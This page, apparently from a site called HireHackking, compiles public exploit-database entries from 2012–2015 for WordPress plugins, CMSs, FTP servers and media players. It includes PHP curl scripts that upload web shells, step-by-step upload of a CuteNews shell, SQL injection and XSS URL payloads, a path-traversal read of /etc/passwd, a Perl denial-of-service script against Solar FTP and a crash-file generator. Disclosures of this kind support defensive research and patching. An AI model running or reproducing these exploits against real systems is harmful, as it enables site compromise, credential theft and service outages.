HireHackking

# Exploit Title: Albo Pretorio Online 3.2 Multiple Vulnerabilities # Google Dork: inurl:/?action=visatto # Date: 09/06/2015 # Exploit Author: Alessandro Cingolani # Vendor Homepage: http://plugin.sisviluppo.info/ # Software Link: https://downloads.wordpress.org/plugin/albo-pretorio-on-line.3.2.zip # Version: 3.2 # Tested on: Firefox on Ubuntu 64 bit ============== Introduction ============== Albo Pretorio Online is a simple wordpress plugin that allows to manage an official bulletin board (albo). For an Italian law publishing an albo on institutional sites become compulsory in 2009. This made the plugin very popular in the institutional enviroment due to the fact that it is the only one present in the official channels. The plugin suffers from an unauthenticated SQL Injection and other various authenticated vulnerabilities, such as XSS and CSRF. In fact the back-end does not sanitize any input/output, so many vulnerabilities are present. ============= Front-End ============= SQL Injection : http://victim.com/albo-folder/?action=visatto&id=[Inject Here] ============ Back-End ============ In the back-end, no protection against SQL Injection, XSS and CSRF exists. This are just few examples Blind SQL-Injection ==================== http://victim.com/wp-admin/admin.php?page=responsabili&action=edit&id=[Inject Here] http://victim.com/wp-admin/admin.php?page=atti&action=view-atto&id=[Inject Here] CSRF ===== In the back-end, the item deletion is not protected, so any element (acts, responsibles, etc.) could be deleted. POC: Responsible deletion http://victim.com/wp/wp-admin/admin.php?page=responsabili&action=delete-responsabile&id=***responsabile's id*** Act deletion http://victim.com/wp/wp-admin/admin.php?page=atti&action=annulla-atto&id=***atto's id*** Stored XSS =========== This plugin does not sanitize any output so each form input, except email, is vulnerable to stored XSS. Also some Reflected XSS and a possible Shell Uploading vulnerabilities were discovered and fixed. Timeline ========= 9/06/2015 - Vulnerabilities found. Developer Informed 17/06/2015 - Patch Relased (Version 3.3) 02/07/2015 - Exploit disclosed

source: https://www.securityfocus.com/bid/54228/info PHP-Fusion Advanced MP3 Player Infusion is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input. An attacker can exploit this vulnerability to upload arbitrary code and execute it in the context of the web server process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible. Advanced MP3 Player Infusion 2.01 is vulnerable; other versions may also be affected. PostShell.php <?php $uploadfile="lo.php.mp3"; $ch = curl_init("http://http://www.example.com/php-fusion/infusions/mp3player_panel/upload.php?folder=/php-fusion/infusions/mp3player_panel/"); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, array('Filedata'=>"@$uploadfile")); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $postResult = curl_exec($ch); curl_close($ch); print "$postResult"; ?> Shell Access : http://http://www.example.com/php-fusion/infusions/mp3player_panel/lo.php.mp3 lo.php.mp3 <?php phpinfo(); ?>

source: https://www.securityfocus.com/bid/54235/info TEMENOS T24 is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks. GET /jsps/genrequest.jsp?&routineName=OS.NEW.USER& routineArgs=BANNER"/><STYLE>@import"javascript:alert ('XSS%20Dangerous')";</STYLE> HTTP/1.1

source: https://www.securityfocus.com/bid/54239/info LIOOSYS CMS is prone to an SQL-injection vulnerability and an information-disclosure vulnerability. Exploiting these issues could allow an attacker to obtain sensitive information, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. The following example URIs are available: http://www.example.com/index.php?id http://www.example.com/_files_/db.log

source: https://www.securityfocus.com/bid/54238/info JAKCMS PRO is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input. An attacker can exploit this vulnerability to upload arbitrary code and execute it in the context of the web server process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible. JAKCMS PRO 2.2.6 is vulnerable; other versions may also be affected. <?php $uploadfile="lo.php"; $ch = curl_init("http://www.example.com/admin/uploader/uploader.php"); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, array('Filedata'=>"@$uploadfile", 'catID'=>'../admin/css/calendar/')); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $postResult = curl_exec($ch); curl_close($ch); print "$postResult"; ?>

source: https://www.securityfocus.com/bid/54245/info SWFUpload is prone to a cross-site scripting vulnerability because it fails to sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. SWFUpload 2.2.0.1 is vulnerable; prior versions may also be affected. http://www.example.com/v220/swfupload/swfupload.swf?movieName=%22]%29;}catch%28e%29{}if%28!self.a%29self.a=!alert%281%29;//

source: https://www.securityfocus.com/bid/54249/info Zoom Player is prone to a remote denial-of-service vulnerability. Successful exploits may allow attackers to crash the affected application, resulting in denial-of-service conditions. Zoom Player 4.51 is vulnerable; other versions may also be affected. #------------------------------------------------------------------------# # # # Usage : perl zoom.pl # # # #------------------------------------------------------------------------# my $h ="\x4D\x54\x68\x64\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00 \x9b\x0e\xf3\xf8\xdb\xa7\x3b\x6f\xc8\x16\x08\x7f\x88\xa2\xf9\xcb \x87\xab\x7f\x17\xa9\x9f\xa1\xb9\x98\x8e\x2b\x87\xcb\xf9\xbe\x50 \x42\x99\x11\x26\x5c\xb6\x79\x44\xec\xe2\xee\x71\xd0\x5b\x50\x4e \x37\x34\x3d\x55\xc8\x2c\x4f\x28\x9a\xea\xd0\xc7\x6d\xca\x47\xa2 \x07\xda\x51\xb7\x97\xe6\x1c\xd5\xd8\x32\xf9\xb1\x04\xa7\x08\xb2 \xe9\xfb\xb5\x1a\xb7\xa7\x7a\xa6\xf9\xf6\xc9\x93\x91\xa1\x21\x29 \xa3\x1c\xe3\xc7\xcb\x17\xfd\x8d\x65\xfd\x81\x61\x6b\x89\xaf\x53 \x31\x45\x0c\x71\xcb\x93\xcb\x6e\x2a\xcf\xa6\x76\x1a\xa8\xcc\xad \x81\xfd\xc4\x56\xa7\x82\xda\x3d\x20\x80\xff\x4c\xbe\xc0\x4c\x61 \x9e\x75\x4c\x71\xa2\x9d\xfd\x65\xcc\x59\x23\xe0\xeb\xae\x58\xa3 \xe9\xff\x16\xfc\x08\x03\x36\x4a\x69\xbb\xc4\x19\x10\x1b\xc8\x2c \x9e\xd9\x56\xfe\x38\x32\xf7\xe5\x2c\xd8\xb4\x6c\x31\xcc\x15\x5c \x41\xda\x03\xde\x5c\x23\x2d\xda\x4f\x7b\x44\x07\x60\x24\xa7\x58 \x65\xf7\xe9\xaa\xff\x02\x9d\x1f\x39\x76\x7e\x75\x43\xac\xe5\xc9 \xd0\x43\x2e\x4c\xeb\x81\x26\xb5\xcf\x6d\xb9\xe9\xa0\xc7\x85\x4a \xce\x5f\xb4\x34\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x06\x00\x00\x00\xff \xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff \xcb\x6e\x2a\xcf\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"; # A division by zero exploit causing a DoS to the program ( neither you can't play nothing nor close the program ) . # to close the Zoom player you have to use the Windows Task Manager . my $file = "darkexploit.avi"; open ($File, ">$file"); print $File $h; close ($File); #-------------------------------------------------------------------------------

source: https://www.securityfocus.com/bid/54255/info Items Manager Plugin for GetSimple CMS is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input. An attacker can exploit this vulnerability to upload arbitrary code and execute it in the context of the web server process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible. Items Manager Plugin 1.5 is vulnerable; other versions may also be affected. <?php $uploadfile="lo.php"; $ch = curl_init("http://www.example.com/getsimple/plugins/items/uploader/server/php.php"); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, array('qqfile'=>"@$uploadfile")); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $postResult = curl_exec($ch); curl_close($ch); print "$postResult"; ?>

CuteNews 2.0.3 Remote File Upload Vulnerability ================================================= 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' \ __ /'__`\ /\ \__ /'__`\ 0 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1 1 \ \____/ >> Exploit database separated by exploit 0 0 \/___/ type (local, remote, DoS, etc.) 1 1 1 0 [+] Site : Inj3ct0r.com 0 1 [+] Support e-mail : submit[at]inj3ct0r.com 1 0 0 1 ########################################## 1 0 I'm T0x!c member from Inj3ct0r Team 1 1 ########################################## 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 # Exploit Title: CuteNews 2.0.3 Remote File Upload Vulnerability # Date: [02/07/2015] # Exploit Author: [T0x!c] # Facebook: https://www.facebook.com/Dz.pr0s # Vendor Homepage: [http://cutephp.com/] # Software Link: [http://cutephp.com/cutenews/cutenews.2.0.3.zip] # Version: [2.0.3] # Tested on: [Windows 7] # greetz to :Tr00n , Kha&mix , Cc0de , Ghosty , Ked ans , Caddy-dz ..... ========================================================== # Exploit : Vuln : http://127.0.0.1/cutenews/index.php?mod=main&opt=personal 1 - Sign up for New User 2 - Log In 3 - Go to Personal options http://www.target.com/cutenews/index.php?mod=main&opt=personal 4 - Select Upload Avatar Example: Evil.jpg 5 - use tamper data & Rename File Evil.jpg to Evil.php -----------------------------2847913122899\r\nContent-Disposition: form-data; name="avatar_file"; filename="Evil.php"\r\ 6 - Your Shell : http://127.0.0.1/cutenews/uploads/avatar_Username_FileName.php Example: http://127.0.0.1/cutenews/uploads/avatar_toxic_Evil.php

source: https://www.securityfocus.com/bid/54271/info php MBB is prone to multiple cross-site scripting and SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data. Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. php MBB 0.0.3 is vulnerable; other versions may also be affected. http://www.example.com/mbbcms/?ref=search&q=' + [SQL Injection] http://www.example.com/mbbcms/?mod=article&act=search&q=' + [SQL Injection] http://www.example.com/mbbcms/?ref=search&q= [XSS] http://www.example.com/mbbcms/?mod=article&act=search&q= [XSS]

source: https://www.securityfocus.com/bid/54281/info VTE is prone to a vulnerability that may allow attackers to cause an affected application to consume excessive amounts of memory and CPU time, resulting in a denial-of-service condition. echo -en "\e[2147483647L" echo -en "\e[2147483647M" echo -en "\e[2147483647P"

source: https://www.securityfocus.com/bid/54290/info plow is prone to a buffer-overflow vulnerability. Attackers can execute arbitrary code in the context of the affected application. Failed exploit attempts will result in a denial-of-service condition. plow 0.0.5 and prior are vulnerable. perl -e '$x="A"x1096;print("[".$x."]\nA=B")'>plowrc

source: https://www.securityfocus.com/bid/54299/info Classified Ads Script PHP is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query. A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. Classified Ads Script PHP 1.1 is vulnerable; other versions may also be affected. http://www.example.com/test/classifiedscript/admin.php?act=ads&orderType=[ ASC/ DESC ]&search=&orderBy=[SQL-INJECTION] http://www.example.com/test/classifiedscript/admin.php?act=ads&orderType=[SQL-INJECTION] http://www.example.com/test/classifiedscript/admin.php?act=comments&ads_id=&orderType=[ASC / DESC ]&search=&orderBy=[SQL-INJECTION] http://www.example.com/test/classifiedscript/admin.php?act=comments&ads_id=&orderType[SQL-INJECTION]

source: https://www.securityfocus.com/bid/54320/info SocialFit plugin for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks. SocialFit 1.2.2 is vulnerable; other versions may also be affected. http://www.example.com/wordpress/wp-content/plugins/socialfit/popup.php?service=googleplus&msg=%3Cscript%3Ealert%28123%29%3C/script%3E

source: https://www.securityfocus.com/bid/54306/info Solar FTP Server is prone to a remote denial-of-service vulnerability. An attacker can exploit this issue to force the affected application to become unresponsive, denying service to legitimate users. Solar FTP Server 2.2 is vulnerable; other versions may also be affected. # Exploit Title: Solar FTP Server 2.2 Remote DOS crash POC # crash:http://img542.imageshack.us/img542/7633/solar.jpg # Date: July 4, 2012 # Author: coolkaveh # coolkaveh () rocketmail com # https://twitter.com/coolkaveh # Vendor Homepage: http://solarftp.com/ # Version: 2.2 # Tested on: windows XP SP3 #~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ #When sending multiple parallel crafted request to a Solar FTP Server it gets crash #~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ # Crappy Solar FTP Server Remote Denial Of Service #~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ #!/usr/bin/perl -w use IO::Socket; use Parallel::ForkManager; $|=1; sub usage { print "Crappy FTP Server Remote Denial Of Service\n"; print "by coolkaveh\n"; print "usage: perl killftp.pl <host> \n"; print "example: perl Crappyftp.pl www.example.com \n"; } $host=shift; $port=shift || "21"; if(!defined($host)){ print "Crappy FTP Server Remote Denial Of Service\n"; print "by coolkaveh\n"; print "coolkaveh () rocketmail com\n"; print "usage: perl killftp.pl <host> \n"; print "example: perl Crappyftp.pl www.example.com \n"; exit(0); } $check_first=IO::Socket::INET->new(PeerAddr=>$host,PeerPort=>$port,Timeout=>60); if(defined $check_first){ print "$host -> $port is alive.\n"; $check_first->close; } else{ die("$host -> $port is closed!\n"); } @junk=('A'x5,'l%q%j%z%Z'x1000, '%s%p%x%d','024d','%.2049d','%p%p%p%p','%x%x%x%x','%d%d%d%d','%s%s%s%s','%99999999999s', '%08x','%%20d','%%20n','%%20x','%%20s','%s%s%s%s%s%s%s%s%s%s','%p%p%p%p%p%p%p%p%p%p', '%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%','%s'x129,'%x'x57,'-1','0','0x100', '0x1000','0x3fffffff','0x7ffffffe','0x7fffffff','0x80000000','0xfffffffe','0xffffffff','0x10000','0x100000','1', ); @command=( 'NLST','CWD','STOR','RETR','RMD','DELE','RNFR','RNTO','LIST','MDTM','SIZE','STAT','ACCT','HELP','MODE', 'APPE','STRU','SITE','SITE INDEX','TYPE','TYPE A','TYPE E','TYPE L','TYPE I','NLST','CWD','MKD','RMD', 'DELE','RNFR','RNTO','LIST','MDTM','SIZE','STAT','ACCT','HELP','MODE', 'APPE','STRU','SITE','SITE INDEX','TYPE','TYPE A','TYPE E','TYPE L','TYPE I','NLST','CWD', ); print "Crashing Server!\n"; while (1) { COMMAND_LIST: foreach $cmd (@command){ foreach $poc (@junk){ LABEL5: $sock4=IO::Socket::INET->new(PeerAddr=>$host, PeerPort=>$port, Proto=>'tcp', Timeout=>30); if(defined($sock4)){ $sock4->send("$cmd"." "."$poc\r\n", 0); $sock4->send("$poc\r\n", 0); } } } }

source: https://www.securityfocus.com/bid/54326/info WordPress custom tables plugin is prone to a cross-site scripting vulnerability because it fails to sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks. custom tables 3.4.4 is vulnerable; prior versions may also be affected. http://www.example.com/wordpress/wp-content/plugins/custom-tables/iframe.php?s=1&key=%22%3E%3Cscript%3Ealert%28123%29%3C/script%3E

source: https://www.securityfocus.com/bid/54329/info The church_admin plugin for WordPress is prone to a cross-site-scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. church_admin plugin Version 0.33.4.5 is vulnerable; other versions may also be affected. http://www.example.com/wordpress/wp-content/plugins/church-admin/includes/validate.php?id=%3Cscript%3Ealert%28123%29%3C/script%3E

source: https://www.securityfocus.com/bid/54330/info Knews Multilingual Newsletters for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks. Knews Multilingual Newsletters 1.1.0 is vulnerable; other versions may also be affected. http://www.example.com/wordpress/wp-content/plugins/knews/wysiwyg/fontpicker/?ff=%22%3E%3Cscript%3Ealert%28123%29%3C/script%3E

source: https://www.securityfocus.com/bid/54334/info sflog! is prone to a local file-include vulnerability because it fails to sufficiently sanitize user-supplied input. An attacker can exploit this vulnerability to view files and execute local scripts in the context of the webserver process. This may aid in further attacks. sflog! 1.00 is vulnerable; other versions may also be affected. http://www.example.com/sflog/index.php?blog=admin&section=../../../../../../../etc/&permalink=passwd

source: https://www.securityfocus.com/bid/54341/info Apache Sling is prone to a denial-of-service vulnerability. An attacker can exploit this issue to exhaust available memory, resulting in a denial-of-service condition. Apache Sling 2.1.0 and prior are vulnerable. curl -u admin:pwd -d "" "http://example.com/content/foo/?./%40CopyFrom=../"

source: https://www.securityfocus.com/bid/54332/info PHPFreeChat is prone to a cross-site scripting vulnerability because it fails to sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. PHPFreeChat 0.2.8 is vulnerable; other versions may also be affected. http://www.example.com/wordpress/wp-content/plugins/phpfreechat/lib/csstidy-1.2/css_optimiser.php?url=%22%3E%3Cscript%3Ealert%28123%29%3C/script%3E

source: https://www.securityfocus.com/bid/54346/info WebsitePanel is prone to a URI-redirection vulnerability because the application fails to properly sanitize user-supplied input. A successful exploit may aid in phishing attacks; other attacks are possible. WebsitePanel versions prior to 1.2.2.1 are vulnerable. https://www.example.com/hosting/Default.aspx?pid=Login&ReturnUrl=http://<any_domain> https://www.example1.com/hosting/Default.aspx?pid=Login&ReturnUrl=http://<any_domain>/file.exe>

source: https://www.securityfocus.com/bid/54348/info MGB is prone to multiple cross-site scripting vulnerabilities and an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data. Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. MGB 0.6.9.1 is vulnerable; other versions may also be affected. http://www.example.com/mgb/admin/admin.php?action=delete&id=[SQLi]&p=1 http://www.example.com/mgb/index.php?p=1â??"</script><script>alert(document.cookie)</script> [XSS] http://www.example.com/mgb/newentry.php [XSS]

source: https://www.securityfocus.com/bid/54391/info Kajona is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. Kajona 3.4.1 is vulnerable; other versions may also be affected. http://www.example.com/index.php?page=contact&absender_name=%22%3E%3Cscript%3Ealert%28document.cookie%29; %3C/script%3E http://www.example.com/index.php?page=contact&absender_email=%22%3E%3Cscript%3Ealert%28doc ument.cookie%29;%3C/script%3E http://www.example.com/index.php?page=contact&absender_nachricht=%3C/texta rea%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E http://www.example.com/index.php?page=postacomment&comment_name=%22%3E%3Cscript%3Ealert%28document.cookie %29;%3C/script%3E http://www.example.com/index.php?page=postacomment&comment_subject=%22%3E%3Cscript%3Ea lert%28document.cookie%29;%3C/script%3E http://www.example.com/index.php?page=postacomment&comment_messa ge=%3C/textarea%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E http://www.example.com/index.php?module=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E http://www.example.com/index.php?module=login&admin=1&action=%3Cscript%3Ealert%28document.cookie%29;% 3C/script%3E http://www.example.com/index.php?admin=1&module=user&action=list&pv=%22%3E%3Cscript%3Ealert%28doc ument.cookie%29;%3C/script%3E http://www.example.com/index.php?admin=1&module=user&action=list&p e=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E http://www.example.com/index.php?admin=1&module=user&action=newUser&user_username=%22%3E%3Cscript %3Ealert%28document.cookie%29;%3C/script%3E http://www.example.com/index.php?admin=1&module=user&act ion=newUser&user_email=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E http://www.example.com /index.php?admin=1&module=user&action=newUser&user_forename=%22%3E%3Cscript%3Ealert%28do cument.cookie%29;%3C/script%3E http://www.example.com/index.php?admin=1&module=user&action=newUser&a mp;user_name=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E http://www.example.com/index.php?adm in=1&module=user&action=newUser&user_street=%22%3E%3Cscript%3Ealert%28document.cookie%29 ;%3C/script%3E http://www.example.com/index.php?admin=1&module=user&action=newUser&user_postal=% 22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E http://www.example.com/index.php?admin=1&modul e=user&action=newUser&user_city=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E http://www.example.com/index.php?admin=1&module=user&action=newUser&user_tel=%22%3E%3Cscript%3Eal ert%28document.cookie%29;%3C/script%3E http://www.example.com/index.php?admin=1&module=user&action=n ewUser&user_mobile=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E http://www.example.com/index.php?admin=1&module=user&action=groupNew&group_name=%22%3E%3Cscript%3 Ealert%28document.cookie%29;%3C/script%3E http://www.example.com/index.php?admin=1&module=user&actio n=groupNew&group_desc=%3C/textarea%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E http://www.example.com/index.php?admin=1&module=pages&action=newPage&name=%22%3E%3Cscript%3Ealert %28document.cookie%29;%3C/script%3E http://www.example.com/index.php?admin=1&module=pages&action=new Page&browsername=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E http://www.example.com/index .php?admin=1&module=pages&action=newPage&seostring=%22%3E%3Cscript%3Ealert%28document.co okie%29;%3C/script%3E http://www.example.com/index.php?admin=1&module=pages&action=newPage&keywo rds=%3C/textarea%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E http://www.example.com/index.php?adm in=1&module=pages&action=newPage&folder_id=%22%3E%3Cscript%3Ealert%28document.cookie%29; %3C/script%3E http://www.example.com/index.php?admin=1&module=pages&action=newElement&element_name=%22%3E%3Cscr ipt%3Ealert%28document.cookie%29;%3C/script%3E http://www.example.com/index.php?admin=1&module=pages& ;action=newElement&element_cachetime=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E http://www.example.com/index.php?admin=1&module=system&action=newAspect&aspect_name=%22%3E%3Cscri pt%3Ealert%28document.cookie%29;%3C/script%3E http://www.example.com/index.php?admin=1&module=filemanager&action=newRepo&filemanager_name=%22%3 E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E http://www.example.com/index.php?admin=1&module=fi lemanager&action=newRepo&filemanager_path=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/s cript%3E http://www.example.com/index.php?admin=1&module=filemanager&action=newRepo&filemanager_ upload_filter=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E http://www.example.com/index.php?ad min=1&module=filemanager&action=newRepo&filemanager_view_filter=%22%3E%3Cscript%3Ealert% 28document.cookie%29;%3C/script%3E http://www.example.com/index.php?admin=1&module=downloads&action=newArchive&archive_title=%22%3E% 3Cscript%3Ealert%28document.cookie%29;%3C/script%3E http://www.example.com/index.php?admin=1&module=down loads&action=newArchive&archive_path=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script %3E

source: https://www.securityfocus.com/bid/54354/info Flogr is prone to multiple unspecified cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. Flogr 1.7 is vulnerable; other versions may also be affected. http://www.example.com/recent.php?tag=[xss] http://www.example.com/index.php?tag=[xss]